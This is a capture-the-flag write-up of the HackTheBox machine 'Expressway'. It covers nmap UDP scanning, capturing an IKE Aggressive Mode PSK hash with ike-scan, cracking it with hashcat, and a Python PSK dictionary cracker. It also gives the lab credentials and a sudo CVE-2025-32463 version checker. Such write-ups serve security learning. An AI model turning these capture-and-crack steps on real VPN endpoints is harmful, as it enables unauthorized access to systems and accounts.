Welcome! #
- HackTheBox is an offensive cybersecurity focused platform.
- This is a writeup for an Easy Linux machine named Expressway.
- We take advantage of IKE Aggressive Mode to capture a PSK hash, crack that hash for credentials, SSH onto the box, and abuse a sudo CVE to get root.
nmap #
Let’s start with enumerating the TCP ports on the endpoint.
nmap -sCV -p- 10.129.238.52
'-sCV' - Combines '-sC' (run the default NSE script set) and '-sV' (probe open ports for service and version information).
'-p-' - All 65535 TCP ports instead of nmap's default top 1000.
Results:
Nmap scan report for 10.129.238.52
Host is up (0.0090s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH is the only open TCP port, and that OpenSSH version is fairly up to date, so I don't expect this to be the entry point they want from us. Let's enumerate the endpoint's UDP ports.
nmap -sCVU 10.129.238.52
'-sCVU' - '-sC' and '-sV' as before, plus '-sU' for a UDP scan (nmap's default top 1000 UDP ports). UDP scans are slow: a closed port is only detected by an ICMP port-unreachable reply, and most hosts rate-limit those, which is why this scan takes around twenty minutes.
Nmap scan report for 10.129.238.52
Host is up (0.0090s latency).
Not shown: 996 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
| fingerprint-strings:
| IKE_MAIN_MODE:
|_ "3DUfw
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=2/27%Time=69A25C3B%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw\xdf\xca\xfa-G\xbc\xa4\xd5\x01\x10\x02\0
SF:\0\0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\
SF:0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x
SF:01\x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0
SF:\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,
SF:9C,"1'\xfc\xb08\x10\x9e\x89\xa8ULb\x9f\x05\xe1\xf8\x01\x10\x02\0\0\0\0\
SF:0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x2
SF:0\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\x
SF:80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x
SF:14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd
SF:5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x
SF:80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1270.09 seconds
68, 69, and 4500 came back open|filtered, which for UDP means nothing answered and nmap can't tell open from filtered. isakmp on UDP 500 is the only port that actually returned data, so that's what I'm going to poke at first.
Looking at the HackTricks page on pentesting IPsec/IKE VPNs (UDP 500) for the usual approach.
ike-scan #
sudo ike-scan -M -A 10.129.238.52
'-M' - Multiline output (to make it easier to read)
'-A' - IKE Aggressive Mode. Unlike Main Mode, the Aggressive Mode exchange sends the responder's identity and its authentication hash (HASH_R) in the clear before the initiator has proven anything, which is what makes the PSK crackable offline.
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.238.52 Aggressive Mode Handshake returned
HDR=(CKY-R=31780678f7f2c97c)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, [email protected])
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.020 seconds (49.22 hosts/sec). 1 returned handshake; 0 returned notify
That ID is interesting: the responder volunteers its own ID_USER_FQDN identity, which gives us a name to use. Let's see if we can get a hash.
sudo ike-scan -M -A -n ike --pskcrack=hash.txt 10.129.238.52
'-M' - Multiline output (to make it easier to read)
'-A' - IKE Aggressive Mode
'-n ike' - Use 'ike' as our initiator ID, taken from the identity the responder returned above. ike-scan's default ID type is ID_USER_FQDN, the same type the responder used.
'--pskcrack=hash.txt' - Write the Aggressive Mode PSK parameters (the psk-crack / hashcat -m 5400 line format) to hash.txt for offline cracking.
Worked. :)
hashcat #
hashcat -a 0 -m 5400 ./hash.txt /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt
'-a 0' - Attack mode: dictionary (straight) attack
'-m 5400' - Hash type: IKE-PSK SHA1, matching the Hash=SHA1 transform negotiated above (an MD5 transform would need -m 5300)
'./hash.txt' - The saved hash line from ike-scan
'rockyou.txt' - Dictionary file of choice
Cracked it for the credentials: ike:freakingrockstarontheroad
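What ike-scan writes to hash.txt and what hashcat -m 5400 does with it is easier to see in code. The block below is an added example, not the writeup's own code nor ike-scan's or hashcat's: it parses the psk-crack line format (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r), recomputes the responder's HASH_R for each candidate PSK using the RFC 2409 construction, and stops on a match. Because no real capture is included here, it builds a constructed handshake line for the PSK this box used; the DH publics, cookies and nonces are seeded random bytes of the sizes ike-scan reported, and the SA body and the ike@example.invalid identity are assumed placeholders.

```python
"""Offline cracking of an IKEv1 Aggressive Mode PSK, the way psk-crack and
hashcat -m 5400 do it. Added example, not the writeup's or ike-scan's code.

Aggressive Mode hands the initiator everything needed to recompute the
responder's authentication hash except the PSK itself (RFC 2409, section 5):

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

prf is HMAC-SHA1 for the Hash=SHA1 transform negotiated above.
"""
import hashlib
import hmac
import random
from typing import Dict, Iterable, Optional

# ike-scan --pskcrack writes one line of colon-separated hex fields, in this order.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def compute_hash_r(psk: bytes, f: Dict[str, bytes]) -> bytes:
    """Recompute HASH_R for a candidate PSK from the captured handshake fields."""
    skeyid = hmac.new(psk, f["ni_b"] + f["nr_b"], hashlib.sha1).digest()
    msg = f["g_xr"] + f["g_xi"] + f["cky_r"] + f["cky_i"] + f["sai_b"] + f["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    """Parse the psk-crack / hashcat 5400 line format into raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    f = dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))
    # A 16-byte hash means the peer negotiated MD5 (hashcat -m 5300), not SHA1.
    if len(f["hash_r"]) != hashlib.sha1().digest_size:
        raise ValueError("hash_r is not a SHA1 digest; use the MD5 variant instead")
    return f


def crack_psk(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first word whose HASH_R matches, else None."""
    f = parse_pskcrack_line(line)
    for word in wordlist:
        if hmac.compare_digest(compute_hash_r(word.encode(), f), f["hash_r"]):
            return word
    return None


def make_sample_line(psk: bytes, seed: int = 1) -> str:
    """Build a CONSTRUCTED handshake line for a known PSK (not a real capture).

    Field sizes mirror the ike-scan output above: 128-byte DH publics
    (modp1024), 8-byte cookies, 32-byte nonces. The SA body is a placeholder
    and the ID is ID_USER_FQDN (type 3) carrying an assumed e-mail identity.
    """
    rng = random.Random(seed)

    def rb(n: int) -> bytes:
        return bytes(rng.getrandbits(8) for _ in range(n))

    f = {
        "g_xr": rb(128),
        "g_xi": rb(128),
        "cky_r": rb(8),
        "cky_i": rb(8),
        "sai_b": bytes.fromhex("00000001000000010000002801010001"),  # assumed SA body
        "idir_b": b"\x03\x00\x00\x00" + b"ike@example.invalid",      # assumed ID body
        "ni_b": rb(32),
        "nr_b": rb(32),
    }
    f["hash_r"] = compute_hash_r(psk, f)
    return ":".join(f[k].hex() for k in FIELDS)


# Constructed line for the PSK this box actually used.
SAMPLE_LINE = make_sample_line(b"freakingrockstarontheroad")

if __name__ == "__main__":
    print(crack_psk(SAMPLE_LINE, ["password", "letmein", "freakingrockstarontheroad"]))
```

The hash.txt line ike-scan produced on the box can be passed to crack_psk as-is; the point of the example is the construction, not speed, so for a rockyou-sized list stay with hashcat. Note that nothing in the line is secret except the PSK: the nonces, cookies and DH publics all travel in the clear, so once Aggressive Mode with PSK authentication is observed the only remaining defence is PSK strength.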
user - SSH #
Was able to use the cracked credentials (ike:freakingrockstarontheroad) to SSH into the box.
Got user flag. :)
I first looked at the TFTP root on the box (69/udp from the scan), but it only held a Cisco configuration file, which wasn't helpful for escalation.
LinPEAS #
Ran LinPEAS, which flagged the installed sudo as out of date and vulnerable. Worth confirming with 'sudo -V' rather than trusting the tool outright: CVE-2025-32463 affects sudo 1.9.14 through 1.9.17 and was fixed in 1.9.17p1, so a build just outside that range would be a false positive.
root - CVE-2025-32463 #
Got root. :)
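A version check for CVE-2025-32463, added here as an example rather than taken from the writeup: it parses the first line of 'sudo -V' and reports whether the build falls in the affected range, 1.9.14 through 1.9.17, fixed in 1.9.17p1. The patch-level suffix is the subtle part, since 1.9.17 is vulnerable and 1.9.17p1 is not, so a plain string comparison would get it wrong. The sample outputs in the block are constructed, not captured from the target, and a hit should still be cross-checked against the distribution's advisory because distros sometimes backport fixes without bumping the upstream version.

```python
"""Version-range check for CVE-2025-32463 (sudo --chroot / nsswitch.conf).

Affected: sudo 1.9.14 through 1.9.17 inclusive. Fixed: 1.9.17p1.
The "pN" suffix is a patch level and must sort after the bare release.
Added example, not part of the original writeup.
"""
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, plevel)

FIRST_AFFECTED: Version = (1, 9, 14, 0)
FIXED: Version = (1, 9, 17, 1)

# The first line of `sudo -V` looks like "Sudo version 1.9.16p2".
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text: str) -> Optional[Version]:
    """Extract (major, minor, patch, plevel) from `sudo -V` output, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_vulnerable(version: Version) -> bool:
    """True when the version lies in [1.9.14, 1.9.17p1)."""
    return FIRST_AFFECTED <= version < FIXED


def assess(text: str) -> str:
    """Human-readable verdict for a `sudo -V` output string."""
    v = parse_sudo_version(text)
    if v is None:
        return "could not parse a sudo version"
    label = "%d.%d.%d" % v[:3] + (f"p{v[3]}" if v[3] else "")
    if is_vulnerable(v):
        return f"sudo {label}: in the CVE-2025-32463 range; confirm against the distro advisory"
    return f"sudo {label}: outside the CVE-2025-32463 range"


def check_local_sudo() -> str:
    """Run `sudo -V` on this host (no password is needed for -V) and assess it."""
    try:
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return "sudo not installed"
    return assess(out)


# Constructed sample outputs, not captured from the target.
SAMPLES = [
    "Sudo version 1.9.16p2\nSudoers policy plugin version 1.9.16p2\n",
    "Sudo version 1.9.17\n",
    "Sudo version 1.9.17p1\n",
    "Sudo version 1.9.13p3\n",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(assess(s))
    print(check_local_sudo())
```

Running it on the box after landing as the low-privilege user is a quick way to confirm the LinPEAS finding before spending time on the escalation.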